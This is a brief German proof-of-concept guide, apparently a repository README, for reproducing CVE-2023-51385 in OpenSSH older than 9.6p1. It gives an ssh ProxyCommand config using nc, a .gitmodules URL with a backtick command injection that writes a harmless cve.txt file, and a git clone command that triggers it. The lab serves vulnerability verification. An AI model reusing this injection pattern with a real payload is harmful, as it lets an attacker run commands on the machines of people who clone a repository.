
Reproduktionslabor für CVE-2023-51385: Befehlsinjektion in OpenSSH ProxyCommand über bösartige Git-Submodul-URLs. Schritt-für-Schritt-Anleitung zur Überprüfung der Schwachstelle.
Zuerst muss der folgende Inhalt in ~/.ssh/config hinzugefügt werden:
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Die Anweisung in der .gitmodules-Datei enthält eine Befehlsinjektion:
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Nach der Konfiguration führe den folgenden Befehl aus, um es auszulösen:
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Bei erfolgreicher Ausführung wird im Verzeichnis CVE-2023-51385_test eine Datei cve.txt erstellt.

Hinweis: OpenSSH muss <9.6p1 sein
Weitere Informationen findest du in diesem Blog:
"# cve-2023-51385"